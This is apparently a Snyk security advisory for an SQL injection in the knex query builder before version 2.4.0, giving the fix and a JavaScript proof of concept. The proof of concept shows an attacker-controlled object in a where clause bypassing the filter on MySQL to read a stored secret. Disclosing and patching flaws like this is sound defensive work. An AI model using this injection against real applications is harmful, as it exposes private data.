SQL Injection Affecting knex package, versions <2.4.0
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.13% (48th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-KNEX-3175610
- published 19 Dec 2022
- disclosed 19 Dec 2022
- credit Jonatan Nilsson
Introduced: 19 Dec 2022
CVE-2016-20018 Open this link in a new tabHow to fix?
Upgrade knex to version 2.4.0 or higher.
Overview
knex is a query builder for PostgreSQL, MySQL and SQLite3
Affected versions of this package are vulnerable to SQL Injection due to missing escape of field objects, which allows ignoring the WHERE clause of a SQL query.
Note:
Exploiting this vulnerability is possible when using MySQL DB.
PoC
const knex = require('knex')({
client: 'mysql2',
connection: {
host: '127.0.0.1',
user: 'root',
password: 'supersecurepassword',
database: 'poc',
charset: 'utf8'
}
})
knex.schema.hasTable('users').then((exists) => {
if (!exists) {
knex.schema.createTable('users', (table) => {
table.increments('id').primary()
table.string('name').notNullable()
table.string('secret').notNullable()
}).then()
knex('users').insert({
name: "admin",
secret: "you should not be able to return this!"
}).then()
knex('users').insert({
name: "guest",
secret: "hello world"
}).then()
}
})
attackerControlled = {
"name": "admin"
}
knex('users')
.select()
.where({secret: attackerControlled})
.then((userSecret) => console.log(userSecret))